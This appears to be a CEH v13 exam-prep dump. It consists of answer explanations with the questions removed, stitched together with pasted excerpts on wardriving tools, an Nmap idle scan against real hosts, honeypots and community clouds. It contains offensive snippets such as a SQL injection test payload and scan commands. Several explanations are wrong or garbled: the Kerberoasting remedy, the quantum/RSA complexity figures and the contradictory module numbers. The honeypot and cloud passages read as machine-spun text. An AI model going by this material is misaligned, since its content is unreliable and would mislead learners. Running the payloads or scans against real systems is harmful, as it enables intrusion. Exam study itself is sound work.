312-50v13 Certified Ethical Hacker Exam (CEHv13) Questions and Answers

A Kerberoasting attack is a technique that exploits the Kerberos authentication protocol to obtain the password hash of a service account that has a Service Principal Name (SPN). An attacker can request a service ticket (TGS) for the SPN using a valid user’s ticket (TGT) and then attempt to crack the password hash offline. To prevent the attacker from using the TGS to access the service, the system administrator should invalidate the TGS as soon as possible. This can be done by changing the password of the service account, which will generate a new password hash and render the old TGS useless. Alternatively, the system administrator can use tools like Mimikatz to purge the TGS from the memory of the domain controller or the client system. Performing a system reboot, deleting the compromised user’s account, or changing the NTLM password hash used to encrypt the ST are not effective ways to invalidate the TGS, as they do not affect the encryption of the TGS or the validity of the TGT. References:

EC-Council CEHv12 Courseware Module 11: Hacking Webservers, page 11-24

What is a Kerberoasting Attack? – CrowdStrike

How to Perform Kerberoasting Attacks: The Ultimate Guide - StationX

DNS cache snooping is an enumeration technique where the attacker queries a DNS server to check whether a specific domain has been recently resolved by the server (i.e., it exists in the cache). If a positive response is received with low latency, it indicates that the domain was visited recently.

Key points:

Used to infer user browsing habits or visited domains.

Helps attackers identify user interests or potential targets.

Incorrect Options:

A. DNS zone walking is used to list all domain names in a DNS zone (with misconfigured DNS servers), not for cached record inspection.

C. DNSSEC zone walking applies only when DNSSEC is misconfigured.

D. DNS cache poisoning is a manipulation technique, not a passive enumeration method.

Reference – CEH v13 Official Courseware:

Module 04: Enumeration

Section: “DNS Enumeration”

Subsection: “DNS Cache Snooping and Timing Analysis”

Tool Reference: dig, nslookup

===========

Open-source intelligence (OSINT) refers to the process of collecting and analyzing information from publicly available sources. This can include social media, websites, press releases, job boards, government databases, and more.

OSINT is a crucial part of the reconnaissance phase in ethical hacking and penetration testing, where attackers or analysts gather intel without directly interacting with the target system.

Reference – CEH v13 Official Study Guide:

Module 2: Footprinting and Reconnaissance

Quote:

“OSINT is derived from public sources and includes blogs, websites, public records, and social networks. It helps attackers or analysts understand the target’s digital footprint.”

Incorrect Options Explained:

B. “Real intelligence” is not a cybersecurity term.

C. Social intelligence refers to interpersonal awareness, not cyber reconnaissance.

D. Human intelligence (HUMINT) involves person-to-person intel, not publicly available data.

===========

Josh is preparing to send the payload (malicious file) to the target, which clearly maps to the Delivery phase of the Cyber Kill Chain.

According to CEH v13 and the Cyber Kill Chain model (developed by Lockheed Martin and used in ethical hacking methodology):

Delivery is the third phase of the kill chain.

It involves transmitting the weaponized payload to the target via phishing emails, USB drops, or malicious links.

In this case, Josh is preparing the email with a spoofed identity and malicious attachment — representing an act of delivery.

Incorrect options:

A. Exploitation occurs after delivery, when the payload is executed.

B. Weaponization is the phase where the malicious file is created (combining exploit with a backdoor or trojan).

D. Reconnaissance involves information gathering, completed earlier in the scenario.

Reference – CEH v13 Official Courseware:

Module 01: Introduction to Ethical Hacking

Section: “Cyber Kill Chain Model”

Table Reference: “Stages of a Cyber Attack”

CEH Engage Lab: “Kill Chain Simulation in Phishing Campaigns”

HTTP cookies may store authentication tokens, allowing users to remain logged in. If a browser retains cookies after closing, an attacker with access to the device could hijack active sessions.

Automatically deleting cookies upon termination reduces the window of opportunity for session hijacking.

Reference – CEH v13 Official Study Guide:

Module 11: Hacking Web Applications

Topic: Session Management

Quote:

“Session hijacking exploits persistent cookies or session IDs stored in browsers. Enforcing cookie deletion helps prevent this attack.”

Incorrect Options:

A. SQL databases are unrelated to browser cookies.

C. Browser cookies don’t store OS-level passwords.

D. This may be a secondary concern, but not the primary mitigation.

===========

A digital certificate, issued by a trusted Certificate Authority (CA), binds a public key to the identity of an entity (e.g., user, organization). This provides a means to validate ownership of the public key.

CEH v13 Reference:

Module 17: Cryptography

"A digital certificate ensures the authenticity of the public key through a trusted third party known as a Certificate Authority."

━━━━━━━━━━━━━━━━━━━━━━

CEH v13 outlines a structured approach to vulnerability assessment and exploitation. After identifying a high-severity vulnerability, the next critical step is verification and research, not immediate exploitation. This ensures accuracy, reduces false positives, and avoids unnecessary risk. CEH emphasizes that testers must validate vulnerability details, confirm version applicability, assess exploit availability (e.g., Metasploit, Exploit-DB), and evaluate potential impact. Attempting DoS attacks (Option A) is prohibited unless explicitly scoped and does not align with responsible testing. Brute-force attacks (Option B) are unrelated to software version vulnerabilities. Ignoring the issue (Option D) violates CEH methodology. The correct process is to research and verify—ensuring exploitation is safe, relevant, and authorized. This aligns with CEH’s vulnerability management lifecycle: discovery → verification → prioritization → exploitation (when allowed) → reporting.

In CEH v13 Module 03: Scanning Networks, under the Nmap Host Discovery Techniques, TCP SYN ping scan is explained as one of the methods used to determine whether a host is online by sending SYN packets to specified TCP ports.

When using Nmap:

-PS specifies a TCP SYN ping scan. It sends SYN packets to a given port (by default port 80, unless specified) to check whether a host is up and whether the port is open.

The response type to this SYN packet determines the host status:

If a SYN/ACK is received, it indicates the port is open, and the host is up.

If RST is received, the port is closed, but the host is still considered online.

If no response or ICMP unreachable is received, the host may be down or filtered.

Clarification of options:

A. -pp: This is not a valid Nmap option.

B. -PO: This sends IP Protocol Ping, used less frequently and not the same as SYN ping.

C. -PS: Correct. Performs a TCP SYN Ping Scan.

D. -PA: Sends TCP ACK Ping, used to determine firewall presence but not the same as SYN scan.

Reference from CEH v13 Study Guide and Course Material:

CEH v13 Official Module 03 – Scanning Networks, Slide: Nmap Host Discovery Techniques

EC-Council iLabs - Scanning Networks Practical Lab Guide: Section on nmap -sn -PS

Nmap Official Documentation (also referenced in CEH): https://nmap.org/book/man-host-discovery.html

https://github.com/verovaleros/bluedriving

Bluedriving is a bluetooth wardriving utility. It can capture bluetooth devices, lookup their services, get GPS information and present everything in a nice web page. It can search for and show a lot of information about the device, the GPS address and the historic location of devices on a map. The main motivation of this tool is to research about the targeted surveillance of people by means of its cellular phone or car. With this tool you can capture information about bluetooth devices and show, on a map, the points where you have seen the same device in the past.

In CEH v13 Module 14: Cryptography, key escrow is discussed as a recovery mechanism where a third party securely holds a cryptographic key for retrieval if it’s lost.

Key Escrow Characteristics:

Common in enterprise environments for systems like BitLocker.

Keys are automatically backed up to Active Directory (AD) for future retrieval.

Ensures that encrypted data is not permanently lost due to forgotten or deleted keys.

Option Clarification:

A. Key archival: Storing old keys for audit/record-keeping.

B. Key escrow: Correct – Third-party or central storage for recovery purposes.

C. Certificate rollover: Replacement of expiring certificates.

D. Key renewal: Generating a new key after expiration or compromise.

CEH v13 defines a white hat hacker as a security professional with explicit authorization to perform penetration testing, vulnerability assessments, and exploitation attempts within legal and contractual boundaries. Their objective is to strengthen security, not compromise it. White hats follow structured methodologies, document findings, and provide remediation recommendations. A black hat (Option A) acts maliciously and without permission. A grey hat (Option B) operates without authorization but without harmful intent, which is not compliant with corporate penetration testing procedures. Script kiddies (Option C) rely on pre-built tools without deep knowledge and are not employed for legitimate engagements. Therefore, the individual described is a white hat, operating under legal and ethical guidelines with organizational consent.

To start the Computer Management Console from command line just type compmgmt.msc /computer:computername in your run box or at the command line and it should automatically open the Computer Management console.

CEH v13 explains that IDS systems are often tuned to detect active scanning behavior, especially port scans and TCP/UDP probing that generate recognizable signatures. The command nmap -sn -PE performs a pure ICMP Echo Request ping sweep without sending any TCP SYN, UDP probes, or other packets normally associated with port enumeration. Since this mode disables port scanning entirely, it produces minimal traffic that resembles legitimate network behavior. CEH emphasizes that many networks allow ICMP Echo traffic internally for diagnostics, so such pings may not be treated as suspicious unless rate thresholds are exceeded. Because the tester avoided SYN packets, ACK probes, and UDP scans, the IDS saw no malicious pattern or connection attempts. The effectiveness of this technique is highlighted in CEH under passive and stealth reconnaissance, where minimal interaction is used to avoid detection. Thus, the scan succeeded because it relied solely on ICMP host discovery, not port scanning.

CEH IoT security modules describe insecure network services as vulnerabilities arising when IoT devices communicate over unencrypted channels, use unauthenticated update mechanisms, or expose services that fail to validate data integrity. When operational commands and firmware updates are transmitted over HTTP without cryptographic safeguards, attackers can intercept, replay, or modify the data stream. Firmware integrity verification is a critical component of secure device lifecycle management. Without it, adversaries can perform firmware injection, allowing them remote control, persistent compromise, or sabotage of device functionality. This aligns directly with insecure network services, which CEH defines as improperly protected communication mechanisms and service interactions within IoT ecosystems. Insecure ecosystem interfaces generally relate to cloud APIs and web dashboards, insecure default settings involve weak credentials or factory configurations, and insufficient privacy protection relates to data confidentiality rather than command manipulation. The described scenario most clearly fits insecure network services.

Comprehensive and Detailed Explanation:

Subnet 10.1.4.0/23 includes addresses from:

10.1.4.0 to 10.1.5.255

Total = 512 IPs (510 usable)

Last 100 usable IPs would be:

Start: 10.1.5.155 to 10.1.5.254

Only option C (10.1.5.200) falls within that range.

From CEH v13 Courseware:

Module 3: Subnetting & IP Addressing

In CEH v13 Module 02: Footprinting and Reconnaissance, the OSINT Framework is introduced as a collection of free, open-source tools and resources to aid ethical hackers in passive reconnaissance.

Key Features of OSINT Framework:

Web-based visual tool that maps out links to open-source intelligence tools.

Allows collection of emails, domains, usernames, IPs, social media data, and more.

Focuses on passive footprinting to avoid detection.

Option Clarification:

A. WebSploit Framework: Used for man-in-the-middle attacks and web vulnerabilities.

B. Browser Exploitation Framework (BeEF): Browser-focused attack tool.

C. OSINT Framework: Correct — open-source intelligence and reconnaissance.

D. SpeedPhish Framework: Phishing simulation tool, not used for passive information gathering.

Comprehensive and Detailed Explanation:

IDS cannot easily detect malicious content in encrypted traffic. Since the payload is encrypted (e.g., HTTPS, SSL/TLS), it is unreadable without decryption.

Statement B is therefore FALSE.

From CEH v13 Courseware:

Module 13: IDS, Firewalls and Honeypots → Limitations of IDS

Web Application Threats - Watering Hole Attack In a watering hole attack, the attacker identifies the kinds of websites a target company/individual frequently surfs and tests those particular websites to identify any possible vulnerabilities. Attacker injects malicious script/code into the web application that can redirect the webpage and download malware onto the victim machine. (P.1797/1781)

SQL injection is one of the most common and dangerous vulnerabilities covered in CEH training. It occurs when an application accepts unsanitized input and directly passes it to a backend SQL query. To confirm the presence of SQL injection, the tester must insert a payload that alters the logic of the SQL query executed by the application. A classic test payload such as “1 OR 1=1 —” is widely used because it forces the database to return all rows instead of filtering based on the intended search value. This verifies whether the input field is being concatenated directly into a SQL command. The CEH methodology emphasizes starting with simple, non-destructive boolean-based payloads to safely evaluate the vulnerability without causing harm to the database or impacting server availability. Since directory traversal, brute-force login attempts, and XSS attacks target entirely different weaknesses, they are not appropriate for confirming SQL injection. The selected option aligns with proper CEH testing methodology for identifying insecure input handling and improper query construction.

A Collision attack is a type of cryptographic attack that targets the hash function. The goal of this attack is to find two different inputs that produce the same hash output. This undermines the integrity of the hashing algorithm, as hash functions are expected to produce a unique output for each unique input.

In practical terms, if two different documents (inputs) produce the same hash value (collision), an attacker can replace a legitimate file with a malicious one without detection, assuming the system validates integrity only via the hash.

CEH v13 defines a collision attack as follows:

"A collision attack focuses on finding two different messages (M1 and M2) that produce the same hash value. This can compromise digital signatures, certificates, and other security protocols."

Reference – CEH v13 Study Guide:

Module 20: Cryptography, Section: “Hashing Algorithms and Attacks”, Subsection: “Collision Attacks”

Incorrect Options Explained:

A: Public keys are part of asymmetric encryption, not relevant to collisions.

B/C: These are incorrect descriptions; collision attacks are not about breaking hashes into parts to retrieve plaintext or private keys.

‒‒‒‒‒‒‒‒‒‒‒‒‒‒‒

In CEH v13 Module 01: Information Security Governance, PCI-DSS (Payment Card Industry Data Security Standard) is introduced as the mandatory compliance framework for organizations handling credit card transactions.

PCI-DSS Requirements Include:

Encrypting cardholder data.

Maintaining secure systems and applications.

Regular vulnerability testing and audits.

Restricting access to sensitive data.

Option Clarification:

A. FISMA: Applies to U.S. federal information systems.

B. HITECH: Related to health information privacy and HIPAA.

C. PCI-DSS: Correct for credit card companies and merchant environments.

D. SOX (Sarbanes-Oxley): Focuses on financial reporting, not card data.

Firewalking is a technique used to determine what layer 4 protocols a firewall will allow by sending crafted packets with TTL values that expire at the firewall and analyzing ICMP Time Exceeded responses. This helps in determining what ports and services are allowed through a firewall.

???? Reference – CEH v13 Study Guide, Module 11: Evading IDS, Firewalls, and Honeypots

“Firewalking is a technique used to gather information about firewalls and their rule sets by sending packets with TTL values that expire at the firewall.”

❌ Incorrect options:

A. Session hijacking refers to taking over an active session.

C. MITM attacks involve intercepting communications between two parties.

D. Network sniffing involves capturing packets, not probing firewall rules.

CEH covers classical cryptanalytic attacks, including linear cryptanalysis, which uses statistical correlations between plaintext and ciphertext to infer bits of the secret key. If a cipher leaks structural patterns across many data samples, linear approximations can be computed to break the cipher.

Jamming and scrambling are attacks targeting the physical layer of the OSI model, often affecting wireless communication by generating interference to disrupt signal transmission. To mitigate such attacks, one advanced countermeasure is the use of Cognitive Radios.

According to CEH v13 Official Courseware:

Cognitive radios are intelligent radio systems capable of sensing the radio frequency (RF) environment and dynamically adjusting their operating parameters (e.g., frequency, modulation) to avoid interference and jamming.

They enable dynamic spectrum access and help in improving spectrum efficiency and resilience against jamming.

This approach falls under physical-layer security mechanisms.

Incorrect Options:

A. gets and strcpy are unsafe functions vulnerable to buffer overflow, not relevant to DoS protection.

B. Allowing all types of packets increases risk and is not a mitigation.

D. TCP SYN cookies protect against SYN flood attacks and disabling them weakens security.

Reference – CEH v13 Official Courseware:

Module 10: Denial-of-Service (DoS) Attacks

Section: “Defensive Strategies Against Jamming and DoS Attacks”

Subsection: “Physical Layer Countermeasures”

===========

Probing the IPC share by attempting to brute force admin credentials is the most appropriate technique for this scenario, because it can reveal valuable information about the target system, such as its operating system, services, users, groups, and shares. An IPC share is a special share that allows processes to communicate with each other over the network using named pipes. An IPC share can be accessed anonymously or with valid credentials, depending on the security configuration of the target system. A brute force attack is a method of trying different combinations of usernames and passwords until a valid pair is found. By using a brute force attack, the tester can try to access the IPC share with admin credentials, which can grant them more privileges and access to more resources on the target system.

The other options are less suitable or effective techniques for this scenario. Brute forcing Active Directory may not be relevant or feasible, as the target system may not be part of a domain or may have strong password policies. Extracting usernames using email IDs may not provide enough information or access to the target system, as email IDs may not match the usernames or passwords. Conducting a DNS zone transfer may not be possible or useful, as the target system may not be a DNS server or may have restricted zone transfers. A DNS zone transfer is a method of obtaining information about the domain names and IP addresses of the hosts in a network by querying a DNS server. References:

Inter-process communication - Wikipedia

IPC$ share and null session behavior - Windows Server

Brute Force Attack: Definition, Examples, and Prevention

DNS Zone Transfer: Definition, Types, and Examples

To block NetBIOS and related Windows networking traffic from traversing a firewall (especially from external sources), you should block the following ports:

Port 135 (TCP/UDP): Microsoft RPC endpoint mapper (DCOM/RPC)

Port 139 (TCP): NetBIOS Session Service

Port 445 (TCP): Direct-hosted SMB over TCP/IP (Windows 2000+)

These ports are commonly used for:

File sharing

RPC-based communication

Windows network services

From CEH v13 Official Courseware:

Module 3: Scanning Networks

Module 4: Enumeration

CEH v13 Study Guide states:

“To prevent external enumeration, remote file sharing, and NetBIOS attacks, administrators should block inbound access to ports 135, 139, and 445 on the firewall.”

Incorrect Options:

A (110): POP3 mail service

D (161): SNMP

F (1024): High ephemeral port; not specific to NetBIOS

CEH training emphasizes that mobile applications frequently mishandle local storage, leaving sensitive data such as tokens, passwords, API keys, or personal information unencrypted within SQLite databases, shared preferences, or flat-file storage. When encryption is absent or improperly implemented, attackers can directly access this data through filesystem extraction, Android Debug Bridge (ADB) access, physical device access, or rooted environments. CEH identifies “Insecure Data Storage” as one of the most critical mobile vulnerabilities because it bypasses server-side defenses entirely. Since the vulnerability specifically concerns data at rest, the most direct and effective exploitation method is to retrieve the locally stored unencrypted data. SQL injection (Option B) evaluates backend security, not device storage. XSS (Option C) is a web attack and unrelated to local encryption. Brute-forcing credentials (Option D) is unnecessary when sensitive information is already stored insecurely. Therefore, accessing local storage is the correct exploitation method.

The Common Vulnerability Scoring System (CVSS) is a method used to supply a qualitative measure of severity for a vulnerability. CVSS consists of three metric groups: Base, Temporal, and Environmental. The Base metrics produce a score ranging from 0 to 10, which can then be modified by scoring the Temporal and Environmental metrics. A vector string represents the values of all the metrics as a block of text1

The Base metrics measure the intrinsic characteristics of a vulnerability, such as the attack vector, the attack complexity, the required privileges, the user interaction, the scope, and the impact on confidentiality, integrity, and availability. The Base score reflects the severity of a vulnerability assuming that there is no temporal information or context available1

The Temporal metrics measure the characteristics of a vulnerability that change over time, such as the exploit code maturity, the remediation level, and the report confidence. The Temporal score reflects the current state of a vulnerability and its likelihood of being exploited1

The Environmental metrics measure the characteristics of a vulnerability that depend on a specific implementation or environment, such as the security requirements, the modified base metrics, and the collateral damage potential. The Environmental score reflects the impact of a vulnerability on a particular organization or system1

In this scenario, the vulnerability has a Base score of 7, a Temporal score of 8, and an Environmental score of 5. This means that:

The vulnerability has a high severity based on its intrinsic characteristics, such as the attack vector, the attack complexity, the required privileges, the user interaction, the scope, and the impact on confidentiality, integrity, and availability. A Base score of 7 corresponds to a high severity rating according to the CVSS v3.0 specification1

The vulnerability has an increasing likelihood of exploitability over time based on its current state, such as the exploit code maturity, the remediation level, and the report confidence. A Temporal score of 8 is higher than the Base score of 7, which indicates that the vulnerability is more likely to be exploited as time passes1

The vulnerability has a medium impact on the specific environment or implementation based on the security requirements, the modified base metrics, and the collateral damage potential. An Environmental score of 5 is lower than the Base score of 7, which indicates that the vulnerability is less impactful in the particular context of the organization or system1

Therefore, the statement that best describes this scenario is: The vulnerability has an overall high severity, the likelihood of exploitability is increasing over time, and it has a medium impact in their specific environment.

The command in question:

wget 192.168.0.15 -q -S

wget is a command-line utility used to retrieve files via HTTP, HTTPS, or FTP.

-q (quiet mode): Suppresses output, except for errors.

-S: Displays the server response headers (even in quiet mode).

In this case, wget is being used to connect to the specified web server (192.168.0.15) and retrieve the HTTP response headers — such as the Server field (e.g., Apache, Nginx), HTTP status codes, and other metadata.

This is a classic example of banner grabbing — the process of capturing metadata (often from headers) to identify the software, version, or configuration of a service.

Incorrect Options:

A. Content enumeration would require directory brute-forcing tools like DirBuster or Gobuster.

C. DoS attacks require high volumes of traffic or specially crafted packets; wget with a single request does not perform flooding.

D. Downloading full site contents would involve options like -r (recursive) or --mirror, which are not used in this command.

Reference – CEH v13 Official Courseware:

Module 03: Scanning Networks

Section: “Banner Grabbing”

Tool Reference: wget, netcat, telnet, curl for banner enumeration

Comprehensive and Detailed Explanation:

Cryptographic hash functions provide:

Integrity: Any change in the input changes the output hash.

Collision Resistance: It is computationally infeasible to find two inputs that produce the same hash.

This ensures data is not altered during transmission.

From CEH v13 Courseware:

Module 10: Cryptography → Hashing Functions (e.g., SHA-256, MD5)

CEH v13 identifies the Idle Scan as one of the most stealthy and advanced reconnaissance techniques due to its ability to avoid generating any traffic directly between the attacker and the target. Using a “zombie host,” which has predictable IP ID sequencing, the attacker forges packets so that all scan traffic appears to originate from the zombie. The IDS sees communication only between the zombie and the target, not the attacker. This allows evasion of network monitoring tools, traffic correlation systems, and intrusion detection signatures. CEH highlights Idle Scanning as a core technique for bypassing sophisticated detection controls because it leaves no direct fingerprint of the attacker. Options A and B still originate from the attacker’s IP. Option C can evade some filters but remains detectable due to packet anomalies. Only Idle Scanning provides full origin obfuscation, making it the most appropriate method for stealth port enumeration.

https://en.wikipedia.org/wiki/Kismet_(software)

Kismet is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic.

Once a suitable zombie has been found, performing a scan is easy. Simply specify the zombie hostname to the -sI option and Nmap does the rest. Example 5.19 shows an example of Ereet scanning the Recording Industry Association of America by bouncing an idle scan off an Adobe machine named Kiosk.

Example 5.19. An idle scan against the RIAA

# nmap -Pn -p- -sI kiosk.adobe.com www.riaa.com

Starting Nmap ( http://nmap.org )

Idlescan using zombie kiosk.adobe.com (192.150.13.111:80); Class: Incremental

Nmap scan report for 208.225.90.120

(The 65522 ports scanned but not shown below are in state: closed)

Port       State       Service

21/tcp     open        ftp

25/tcp     open        smtp

80/tcp     open        http

111/tcp    open        sunrpc

135/tcp    open        loc-srv

443/tcp    open        https

1027/tcp   open        IIS

1030/tcp   open        iad1

2306/tcp   open        unknown

5631/tcp   open        pcanywheredata

7937/tcp   open        unknown

7938/tcp   open        unknown

36890/tcp  open        unknown

Nmap done: 1 IP address (1 host up) scanned in 2594.47 seconds

A honeypot may be a trap that an IT pro lays for a malicious hacker, hoping that they will interact with it during a way that gives useful intelligence. It’s one among the oldest security measures in IT, but beware: luring hackers onto your network, even on an isolated system, are often a dangerous game.

honeypot may be a good starting place: “A honeypot may be a computer or computing system intended to mimic likely targets of cyberattacks.” Often a honeypot are going to be deliberately configured with known vulnerabilities in situation to form a more tempting or obvious target for attackers. A honeypot won’t contain production data or participate in legitimate traffic on your network — that’s how you’ll tell anything happening within it’s a results of an attack. If someone’s stopping by, they’re up to no good.

That definition covers a various array of systems, from bare-bones virtual machines that only offer a couple of vulnerable systems to ornately constructed fake networks spanning multiple servers. and therefore the goals of these who build honeypots can vary widely also , starting from defense thorough to academic research. additionally , there’s now an entire marketing category of deception technology that, while not meeting the strict definition of a honeypot, is certainly within the same family. But we’ll get thereto during a moment.

honeypots aim to permit close analysis of how hackers do their dirty work. The team controlling the honeypot can watch the techniques hackers use to infiltrate systems, escalate privileges, and otherwise run amok through target networks. These sorts of honeypots are found out by security companies, academics, and government agencies looking to look at the threat landscape. Their creators could also be curious about learning what kind of attacks are out there, getting details on how specific sorts of attacks work, or maybe trying to lure a specific hackers within the hopes of tracing the attack back to its source. These systems are often inbuilt fully isolated lab environments, which ensures that any breaches don’t end in non-honeypot machines falling prey to attacks.

Production honeypots, on the opposite hand, are usually deployed in proximity to some organization’s production infrastructure, though measures are taken to isolate it the maximum amount as possible. These honeypots often serve both as bait to distract hackers who could also be trying to interrupt into that organization’s network, keeping them faraway from valuable data or services; they will also function a canary within the coalpit , indicating that attacks are underway and are a minimum of partially succeeding.

SMTP enumeration involves probing a mail server to gather information about users and configurations. Two important SMTP commands used in enumeration are:

VRFY: Verifies whether a particular email address or user ID exists on the mail server.

EXPN: Reveals the actual addresses behind a mailing list or alias.

These commands allow attackers or penetration testers to enumerate valid user accounts or group memberships, which can later be targeted for phishing, spam, or brute-force attacks.

Incorrect Options:

B. Daily outgoing message limits are not typically disclosed via SMTP.

C. RCPT TO is used to designate a message recipient, but it doesn't enumerate open ports.

D. Mail proxy addresses are not revealed directly via SMTP enumeration.

Reference – CEH v13 Official Courseware:

Module 04: Enumeration

Section: “SMTP Enumeration Techniques”

Tool Reference: smtp-user-enum, Netcat

===========

Restrict results to those of a certain filetype. E.g., PDF, DOCX, TXT, PPT, etc. Note: The “ext:” operator can also be used—the results are identical.

Example: apple filetype:pdf / apple ext:pdf

Sniffing attacks are a type of network attack that involves intercepting and analyzing data packets as they travel over a network. Sniffing attacks can be used to steal sensitive information, such as usernames, passwords, credit card numbers, etc. Sniffing attacks can also be used to perform reconnaissance, spoofing, or man-in-the-middle attacks.

The IT department of the company has implemented some security measures to prevent or mitigate sniffing attacks, such as:

Adding the MAC address of the gateway to the ARP cache: This prevents ARP spoofing, which is a technique that allows an attacker to redirect network traffic to their own device by sending fake ARP messages that associate their MAC address with the IP address of the gateway.

Switching to IPv6 instead of IPv4: This reduces the risk of IP spoofing, which is a technique that allows an attacker to send packets with a forged source IP address, pretending to be another device on the network.

Using encrypted sessions such as SSH instead of Telnet, and Secure File Transfer Protocol instead of FTP: This protects the data from being read or modified by an attacker who can capture the packets, as the data is encrypted and authenticated using cryptographic protocols.

However, these measures are not enough to completely eliminate the threat of sniffing, as an attacker can still use other techniques, such as:

Passive sniffing: This involves monitoring the network traffic without injecting any packets or altering the data. Passive sniffing can be done on a shared network, such as a hub, or on a switched network, using techniques such as MAC flooding, port mirroring, or VLAN hopping.

Active sniffing: This involves injecting packets or modifying the data to manipulate the network behavior or gain access to more traffic. Active sniffing can be done using techniques such as DHCP spoofing, DNS poisoning, ICMP redirection, or TCP session hijacking.

Therefore, the next step to enhance network security is to implement network scanning and monitoring tools, which can help detect and prevent sniffing attacks by:

Scanning the network for unauthorized devices, such as rogue access points, hubs, or sniffers, and removing them or isolating them from the network.

Monitoring the network for abnormal traffic patterns, such as excessive ARP requests, DNS queries, ICMP messages, or TCP connections, and alerting the network administrators or blocking the suspicious sources.

Analyzing the network traffic for malicious content, such as malware, phishing, or exfiltration, and filtering or quarantining the infected or compromised devices.

Data encryption with AES-128 is likely to provide the best balance of security and performance in this scenario. This option works as follows:

AES-128 is a symmetric encryption algorithm that uses a 128-bit key to encrypt and decrypt data. AES-128 is one of the most widely used and trusted encryption algorithms, and it is considered secure against classical and quantum attacks, as long as the key is not compromised. AES-128 has a time complexity of O(n), which means that the encryption and decryption time is proportional to the size of the data. AES-128 is also fast and efficient, as it can process 16 bytes of data in each round, and it requires only 10 rounds to complete the encryption or decryption12.

RSA-4000 is an asymmetric encryption algorithm that uses a 4000-bit key pair to encrypt and decrypt data. RSA-4000 is used for key exchange, which means that it is used to securely share the AES-128 key between the sender and the receiver. RSA-4000 has a time complexity of O(n*2), which means that the key generation, encryption, and decryption time is proportional to the square of the size of the key. RSA-4000 is also slow and resource-intensive, as it involves large number arithmetic and modular exponentiation operations. RSA-4000 is considered secure against classical attacks, but it is vulnerable to quantum attacks, especially if the attacker has access to a quantum computer with sufficient resources to run Shor’s algorithm, which can factor large numbers in polynomial time34.

The attacker’s quantum algorithm has a time complexity of O((log n)*2), which means that the cracking time is proportional to the square of the logarithm of the size of the key. This implies that the attacker can crack RSA-4000 much faster than a classical computer, as the logarithm function grows much slower than the linear or quadratic function. For example, if a classical computer takes 10^12 years to crack RSA-4000, a quantum computer with the attacker’s algorithm could do it in about 10^4 years, which is still a long time, but not impossible5.

Therefore, data encryption with AES-128 is likely to provide the best balance of security and performance in this scenario, because:

AES-128 is secure and fast, and it can encrypt large amounts of data efficiently.

RSA-4000 is slow and vulnerable, but it is only used for key exchange, which involves a small amount of data and a one-time operation.

The attacker’s quantum algorithm is powerful, but it is not practical, as it requires a quantum computer with a large number of qubits and a long coherence time, which are not available yet.

The other options are not as balanced as option C for the following reasons:

A. Data encryption with 3DES using a 168-bit key: This option offers high security but slower performance due to 3DES’s inherent inefficiencies. 3DES is a symmetric encryption algorithm that uses a 168-bit key to encrypt and decrypt data. 3DES is a variant of DES, which is an older and weaker encryption algorithm that uses a 56-bit key. 3DES applies DES three times with different keys to increase the security, but this also increases the complexity and reduces the speed. 3DES has a time complexity of O(n), but it is much slower than AES, as it can process only 8 bytes of data in each round, and it requires 48 rounds to complete the encryption or decryption. 3DES is considered secure against classical and quantum attacks, but it is not recommended for new applications, as it is outdated and inefficient67.

B. Data encryption with Blowfish using a 448-bit key: This option offers high security but potential compatibility issues due to Blowfish’s less widespread use. Blowfish is a symmetric encryption algorithm that uses a variable key size, up to 448 bits, to encrypt and decrypt data. Blowfish is fast and secure, and it has a time complexity of O(n), as it can process 8 bytes of data in each round, and it requires 16 rounds to complete the encryption or decryption. Blowfish is considered secure against classical and quantum attacks, but it is not as popular or standardized as AES, and it may have compatibility issues with some applications or platforms89.

D. Data encryption with AES-256: This option provides high security with better performance than 3DES, but not as fast as other AES key sizes. AES-256 is a symmetric encryption algorithm that uses a 256-bit key to encrypt and decrypt data. AES-256 is a variant of AES, which is the most widely used and trusted encryption algorithm. AES-256 has a time complexity of O(n), and it can process 16 bytes of data in each round, but it requires 14 rounds to complete the encryption or decryption, which is more than AES-128 or AES-192. AES-256 is considered secure against classical and quantum attacks, but it is not as fast as other AES key sizes, and it may not be necessary for most applications, as AES-128 or AES-192 are already secure enough12.

Reconnaissance is the first phase of ethical hacking and also part of the cyber kill chain. It involves gathering publicly available information about a target, such as employee names, company structure, and branding, which is later used in social engineering or phishing attacks.

Reference – CEH v13 Official Study Guide:

Module 2: Footprinting and Reconnaissance

Quote:

“Reconnaissance involves gathering information from public sources such as websites, social networks, and press releases. This is used to craft targeted phishing messages or exploit organizational weaknesses.”

Incorrect Options Explained:

A & B. Not formal terms in ethical hacking.

D. Enumeration involves interacting with systems to extract technical data.

Hashing is a one-way function—by design, it cannot be reversed. Password-cracking tools do not "reverse" the hash. Instead, they:

Generate a list of potential passwords.

Hash each candidate using the same algorithm.

Compare the result to the target hash.

If a match is found, the original password is revealed by correlation, not reversal.

From CEH v13 Official Courseware:

Module 6: Cryptography and Password Cracking

CEH v13 Study Guide states:

“Hash functions are one-way and irreversible. Password-cracking tools work by hashing wordlists or character combinations and comparing them to known password hashes.”

The purpose of this idea is to permit multiple customers to figure on joint projects and applications that belong to the community, where it’s necessary to possess a centralized clouds infrastructure. In other words, Community Cloud may be a distributed infrastructure that solves the precise problems with business sectors by integrating the services provided by differing types of clouds solutions.

The communities involved in these projects, like tenders, business organizations, and research companies, specialise in similar issues in their cloud interactions. Their shared interests may include concepts and policies associated with security and compliance considerations, and therefore the goals of the project also .

Community Cloud computing facilitates its users to spot and analyze their business demands better. Community Clouds could also be hosted during a data center, owned by one among the tenants, or by a third-party cloud services provider and may be either on-site or off-site.

Community Cloud Examples and Use Cases

Cloud providers have developed Community Cloud offerings, and a few organizations are already seeing the advantages . the subsequent list shows a number of the most scenarios of the Community Cloud model that’s beneficial to the participating organizations.

Multiple governmental departments that perform transactions with each other can have their processing systems on shared infrastructure. This setup makes it cost-effective to the tenants, and may also reduce their data traffic.

Benefits of Community Clouds

Community Cloud provides benefits to organizations within the community, individually also as collectively. Organizations don’t need to worry about the safety concerns linked with Public Cloud due to the closed user group.

This recent cloud computing model has great potential for businesses seeking cost-effective cloud services to collaborate on joint projects, because it comes with multiple advantages.

Openness and Impartiality

Community Clouds are open systems, and that they remove the dependency organizations wear cloud service providers. Organizations are able to do many benefits while avoiding the disadvantages of both public and personal clouds.

Flexibility and Scalability

Ensures compatibility among each of its users, allowing them to switch properties consistent with their individual use cases. They also enable companies to interact with their remote employees and support the utilization of various devices, be it a smartphone or a tablet. This makes this sort of cloud solution more flexible to users’ demands.

